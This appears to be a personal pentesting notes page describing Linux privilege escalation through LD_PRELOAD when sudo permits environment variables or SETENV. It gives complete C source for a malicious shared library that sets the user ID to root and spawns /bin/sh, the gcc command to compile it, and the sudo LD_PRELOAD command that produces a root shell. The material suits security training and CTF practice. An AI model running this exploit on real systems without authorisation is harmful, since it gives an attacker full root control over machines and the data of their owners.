# LD\_Preload / SETENV

There are a couple of different ways I have found this to work:

1\. In the below image, if you see the marked area when running sudo -l then you should be good to go.

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FEt0CUHF411VBvsA1sj46%2Fimage.png?alt=media&#x26;token=6cf56fa4-aac5-42ce-a3b9-abfa3a2034a4" alt=""><figcaption></figcaption></figure>

2\. If you run sudo -l and see SETENV under sudo permissions then I would also try this. Note: I had a file path after SETENV when this worked. I have not tried it with a bin, so I can't verify if it works the same.

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FgCDBm4SYbkFxmpvhtk9U%2Fimage.png?alt=media&#x26;token=9f0c7d65-acad-4134-a729-8d5c7ad67590" alt=""><figcaption></figcaption></figure>

1. On attacker machine create a file called shell.c with the following code.

```c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
        unsetenv("LD_PRELOAD");
        setgid(0);
        setuid(0);
        system("/bin/sh");
}
```

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2F5gJWs6gcypaBRYCj9wNe%2Fimage.png?alt=media&#x26;token=1d6ceb16-2289-4bb8-a3ea-c0c95b8df07a" alt=""><figcaption></figcaption></figure>

2\. Build the shell.c code into shell.co

<pre class="language-bash"><code class="lang-bash"><strong>gcc -fPIC -shared -o shell.so shell.c -nostartfiles
</strong></code></pre>

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FQi946Q04Slj1hi1n9LPa%2Fimage.png?alt=media&#x26;token=c1ad07fb-e58e-4e81-a7dc-b91b2d86bc12" alt=""><figcaption></figcaption></figure>

3\. Transfer the shell.so file to the target machine.

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FuOo5VHaWIe9CLpsTQSBJ%2Fimage.png?alt=media&#x26;token=9d596848-c692-45fb-9ef7-f0ea715fb1f3" alt=""><figcaption></figcaption></figure>

4\. Run the code below to get a root shell. Replace the /usr/bin/ping with the path specified in the output from sudo -l.

```
sudo LD_PRELOAD=/tmp/shell.so /usr/bin/ping
```

<figure><img src="https://3800235601-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fx4pJgNiBOMLG3QHRPFAy%2Fuploads%2FwlLPpXwcNGZzhO0N6A4G%2Fimage.png?alt=media&#x26;token=f1f5083d-334e-4306-b353-6dd5a43ec860" alt=""><figcaption></figcaption></figure>